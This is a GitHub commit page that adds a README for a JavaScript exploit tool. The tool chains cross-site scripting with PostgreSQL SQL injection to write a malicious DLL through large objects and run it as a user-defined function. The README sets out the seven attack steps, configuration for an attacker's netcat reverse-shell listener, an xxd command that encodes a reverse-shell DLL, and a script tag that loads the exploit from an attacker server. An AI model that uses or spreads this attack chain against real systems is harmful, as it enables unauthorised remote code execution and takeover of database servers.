Skip to content
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Commit e18f942

Browse files
authoredJan 20, 2022
Update README.md
1 parent b6d345c commit e18f942

File tree

1 file changed

+38
-0
lines changed

1 file changed

+38
-0
lines changed
 

‎README.md

Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,40 @@
11
# Postgres-SQLi-RCE.js
22
PostgreSQL Large Objects and UDF (User Defined Functions) RCE exploit re-written in javascript, for easy chaining with XSS
3+
4+
## Methdology
5+
```
6+
Step 1: Create a DLL file that will contain our malicious code
7+
Step 2: Inject a query that creates a large object from an arbitrary remote file on disk
8+
Step 3: Inject a query that updates page 0 of the newly created large object with the first 2KB of our DLL
9+
Step 4: Inject queries that insert additional pages into the pg_largeobject table to contain the remainder of our DLL
10+
Step 5: Inject a query that exports our large object (DLL) onto the remote server file system
11+
Step 6: Inject a query that creates a PostgreSQL User Defined Function (UDF) based on our exported DLL
12+
Step 7: Inject a query that executes our newly created UDF
13+
```
14+
15+
## Requirements <br>
16+
1. **jQuery:** If the target page does not have jQuery included, you can add it from exploit script like [this](https://stackoverflow.com/questions/1140402/how-to-add-jquery-in-js-file/36343307)
17+
2. **Linux/Windows/MAC OSX:** To generate postgres extension
18+
19+
## Setup
20+
Follow this article to generate a database extension for the target machine <br>
21+
https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
22+
23+
Then, set the following variables
24+
```javascript
25+
var nc_ip = "192.168.XXX.XXX"; //Attacker's netcat listener IP
26+
var nc_port = "4444"; //Attacker's netcat listener port
27+
var url= "/vulnerable-path";
28+
29+
var udf="<Add the database extension hex code here >"; //xxd rev_shell.dll | cut -d" " -f 2-9 | sed 's/ //g' | tr -d '\n' > rev_shell.dll.txt
30+
31+
//Reference: https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
32+
```
33+
## Exploitation: XSS Chaining
34+
```javascript
35+
<script src=http://<attacker-server>/postgres_linux_rce.js></script>
36+
```
37+
38+
39+
40+

0 commit comments

Comments
 (0)
Please sign in to comment.